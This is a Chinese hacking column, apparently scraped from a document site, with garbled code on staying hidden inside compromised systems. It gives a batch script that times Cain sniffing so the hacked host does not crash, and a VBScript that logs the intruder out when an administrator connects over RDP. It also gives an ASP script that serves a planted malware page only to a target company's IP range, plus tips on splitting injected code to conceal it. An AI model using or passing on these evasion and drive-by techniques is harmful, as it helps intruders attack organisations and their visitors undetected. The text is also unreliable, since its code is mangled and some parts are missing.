还剩4页未读,继续阅读
文本内容:
我在入侵过程中注意到的细节
(三)网站平安电脑资料《手册xx03》我在入侵过程中注意到的细节之三lcx前两期中的专栏中,针对细节入侵这一专题,我分别写了我在内网和注入中注意到的一些细节,先来说一下嗅探吧大家常用的工具是cain用法大家都会了但是cain在嗅探过程中,如果遇到流量较大的目标机,往往会把装cain的主机搞死,从而引起管理员的注意像有的时候,嗅了一阵后,就会把3389搞死我也没有更好的方法,只能让cain嗅一段时间后停止,再重新开始如果每次都是手工去停止cain,有时候时间掌握的不及时,3389已经死掉了其实解决这个问题很简单,一个简单的批处理脚本就可以了脚本内容如下★ping
127.
0.
0.1-n5000nultaskkill/F/PID4144★上边批处理脚本中,5000是秒数,用来控制cain的嗅探时间4144是cain的进程数,可以自己用tasklist查一下就知道了这样一来,你可以放心在嗅探这段时间内去做别的事了再来呢,用cain嗅探一般会在3389上,这时候如果碰到管理员登陆3389也不太好办,我的好友Netpatch写过一个终端监视脚本,一旦发现有两人同时登陆终端的话就注销自己脚本内容如下★onerrorresumenextsetarg=wscript.argumentsIfarg.count=0thenwscript.echouse://cscript.exeFS.vbsportsleep1000wscript.quitEndIfTport=arg0Runs=falseWhileruns=falseDimoShelloExecstrOutoRegExpMatchesMatchNumTportSetShell=WScript.CreateObjectWScript.ShellSetExec=oShell.Execstat-anSetRegExp=newRegExpoRegExp.Pattern=TCP[\s]+[\d\.]+:Tport[\s]+[\d\.]+:[\d]+[\s]+ESTABLISHEDoRegExp.IgnoreCase=TrueoRegExp.Global=TrueDoWhileNotoExec.StdOut.AtEndOfStreamstrOut=strOutoExec.StdOut.ReadLineChr13Chr10LoopSetMatches=oRegExp.ExecutestrOutNum=0ForEachMatchInMatchesNum=Num+1Nextifnum1thenRuns=trueoShell.runlogoffendifSetMatches=NothingSetRegExp=NothingSetExec=NothingSetShell=Nothingwend★用此脚本,登陆终端时翻开就可以了,这也是一个比拟好的隐藏自己的方法最后来说一下挂马挂马的隐蔽方法也有很多,以前黑手上讲过几期如果只是盲目的挂马多搞几台肉鸡的话,那个随便你了但是有时候我们入侵了一个公司的web站,目标却是他们的内网,%获取访问者的地址ip=Request.ServerVariablesREMOTEADDR允许的IP地址段为allowip1=
221.
221.
221.1allowip2=
221.
221.
221.254ifcheckipipallowip1allowip2=truethenresponse.write你挂马的页面endiffunctioncheckipipallowip1allowip2dimcheck4checkip=falseipstr=splitip.allow1=splitallowip
1.allow2=splitallowip
2.ifcintallow10cintallow20then判断IP地址段是否合法response.write禁止访问exitfunctionendiffori=0touboundipstrifcintallow1iifcintallow1i=cintipstrithenchecki=truecheckip=trueexitforelseifcintipstriexitforelseifcintipstricintallow2ithenchecki=falsecheckip=falseexitforelsechecki=truecheckip=trueendifendifendifelseifcintallow1icintipstriorcintallow1ichecki=falsecheckip=falseifiuboundipstrthenexitforendifelsechecki=trueendifendifnextifcheck0=trueandcheck1=trueandcheck2=trueandcheck3=falseandcintallow22cintipstr2thencheckip=trueendifendfunction%这个脚本也许考虑得不太周到,但是我觉得足够用了挂马的隐蔽方法也有很多,我最常用的是代码分隔法记得剑心有篇文章,提到过最短的跨站方法,我们也可以用这种方法来挂马的好比常规挂马语句拆分一下转换为★★这样转换的好处是上边的每一行可以分开插入在同一页面不同行中,这样一来就会隐蔽一点了当然如何更好的隐蔽自己有很多不同的方法,各人各有巧妙不同这篇文章只是抛砖引玉,能引起大家的思考我就心满意足了模板内容仅供参考 。